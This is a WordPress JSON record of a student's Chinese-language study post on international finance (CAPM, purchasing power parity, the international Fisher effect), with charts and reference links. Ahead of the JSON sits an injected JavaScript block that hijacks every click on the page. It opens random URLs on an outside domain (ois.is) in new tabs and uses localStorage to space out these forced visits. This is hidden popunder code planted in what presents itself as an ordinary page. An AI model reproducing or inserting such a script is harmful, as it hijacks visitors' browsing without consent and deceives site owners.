<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":923,"date":"2023-02-16T16:09:41","date_gmt":"2023-02-16T08:09:41","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154204\/?p=923"},"modified":"2023-04-08T00:26:57","modified_gmt":"2023-04-07T16:26:57","slug":"%e7%ac%ac%e4%b8%80%e9%80%b1%e4%b8%8a%e8%aa%b2","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154204\/?p=923","title":{"rendered":"First week"},"content":{"rendered":"<p>\u5e0c\u671b\u53ef\u4ee5\u9806\u5229\u4fee\u8ab2\u7562\u696d\uff5e<\/p>\n<p>\u671f\u8a31\u53ef\u4ee5\u597d\u597d\u5b78\u7fd2\u570b\u8ca1\uff0c\u5c0d\u65bcCAPM\u3001PPP\u3001IRP\u7b49\u8ca1\u52d9\u77e5\u8b58\u66b8\u89e3\u4e14\u6709\u66f4\u9032\u4e00\u6b65\u7684\u719f\u6089\u3002<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>CAPM\u7406\u8ad6<\/strong><\/li>\n<\/ul>\n<p>efficient frontier\uff1a\u6548\u7387\u524d\u7de3<\/p>\n<p>tangency portfolio : \u5207\u9ede\u6295\u7d44<\/p>\n<p>risk free rate : \u7121\u98a8\u96aa\u5229\u7387<\/p>\n<p>CAL\uff1a\u8cc7\u672c\u914d\u7f6e\u7dda<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-926\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/capm-chart-300x184.jpg\" alt=\"\" width=\"474\" height=\"291\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/capm-chart-300x184.jpg 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/capm-chart.jpg 463w\" sizes=\"(max-width: 474px) 100vw, 474px\" \/><\/p>\n<p>\u8cc7\u6599\u4f86\u6e90<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"M3V6uIYWRM\"><p><a href=\"https:\/\/www.clsinvest.com\/2012\/09\/14\/capital-asset-pricing-model-provides-interesting-insight-about-investor-expectations\/\">Capital Asset Pricing Model Provides Interesting Insight about Investor Expectations<\/a><\/p><\/blockquote>\n<p><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Capital Asset Pricing Model Provides Interesting Insight about Investor Expectations&#8221; &#8212; CLS Investments, LLC\" src=\"https:\/\/www.clsinvest.com\/2012\/09\/14\/capital-asset-pricing-model-provides-interesting-insight-about-investor-expectations\/embed\/#?secret=IayTsul9nx#?secret=M3V6uIYWRM\" data-secret=\"M3V6uIYWRM\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<p><iframe loading=\"lazy\" title=\"Capital Market Line (CML) vs Security Market Line (SML)\" src=\"https:\/\/www.youtube.com\/embed\/mNZ4BqXVfjs\" width=\"974\" height=\"548\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<ul>\n<li><strong>purchasing power\u00a0parity \u8cfc\u8cb7\u529b\u5e73\u50f9 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0\u662f\u4e00\u7a2e\u6839\u64da\u5404\u570b\u4e0d\u540c\u7684\u50f9\u683c\u6c34\u6e96\u8a08\u7b97\u51fa\u4f86\u7684\u8ca8\u5e63\u4e4b\u9593\u7684\u7b49\u503c\u4fc2\u6578\uff0c\u4f7f\u6211\u5011\u80fd\u5920\u5728\u7d93\u6fdf\u5b78\u4e0a\u5c0d\u5404\u570b\u7684\u570b\u5167\u751f\u7522\u6bdb\u984d\u9032\u884c\u5408\u7406\u6bd4\u8f03<\/strong><\/li>\n<\/ul>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-934 alignleft\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/PPP-1-300x182.jpg\" alt=\"\" width=\"561\" height=\"340\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/PPP-1-300x182.jpg 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/PPP-1.jpg 722w\" sizes=\"(max-width: 561px) 100vw, 561px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>international fisher effect \u570b\u969b\u8cbb\u96ea\u6548\u61c9 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<\/strong><strong>\u6307\u51fa\u540d\u7fa9\u5229\u7387\uff08nominal interest rate\uff09\u7684\u5dee\u7570\u662f\u5404\u570b\u9593\u5373\u671f\u532f\u7387\uff08spot rate\uff09\u9810\u671f\u8b8a\u5316\u4e4b\u53cd\u6620<span id=\"cite_ref-Buckley_2004_1-0\" class=\"mw-ref reference\"><span id=\"cite_ref-Eun_&amp;_Resnick_2011_2-0\" class=\"mw-ref reference\"><\/span>\u3002<\/span><\/strong><\/li>\n<\/ul>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-936 alignleft\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/IFE-768x477-1-300x186.jpg\" alt=\"\" width=\"559\" height=\"347\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/IFE-768x477-1-300x186.jpg 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/02\/IFE-768x477-1.jpg 768w\" sizes=\"(max-width: 559px) 100vw, 559px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>\u8cc7\u6599\u4f86\u6e90:<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"D2nhCUNbtW\"><p><a href=\"https:\/\/si.secda.info\/scu03154106\/?p=1197\">\u3010\u570b\u969b\u8ca1\u52d9\u7ba1\u7406\u3011\u671f\u672b\u5831\u544a<\/a><\/p><\/blockquote>\n<p><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"\u3010\u570b\u969b\u8ca1\u52d9\u7ba1\u7406\u3011\u671f\u672b\u5831\u544a &#8212; Fuztu&#039;s Learning Website\" src=\"https:\/\/si.secda.info\/scu03154106\/?p=1197&#038;embed=true#?secret=D2nhCUNbtW\" data-secret=\"D2nhCUNbtW\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><br \/>\nhttps:\/\/www.wikiwand.com\/zh-tw\/\u570b\u969b\u8cbb\u6c99\u6548\u61c9<br \/>\nhttps:\/\/zh.wikipedia.org\/zh-tw\/\u8d2d\u4e70\u529b\u5e73\u4ef7<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5e0c\u671b\u53ef\u4ee5\u9806\u5229\u4fee\u8ab2\u7562\u696d\uff5e \u671f\u8a31\u53ef\u4ee5\u597d\u597d\u5b78\u7fd2\u570b\u8ca1\uff0c\u5c0d\u65bcCAPM\u3001PPP\u3001IRP\u7b49\u8ca1\u52d9<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/923"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=923"}],"version-history":[{"count":18,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/923\/revisions"}],"predecessor-version":[{"id":1021,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/923\/revisions\/1021"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=923"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=923"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=923"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}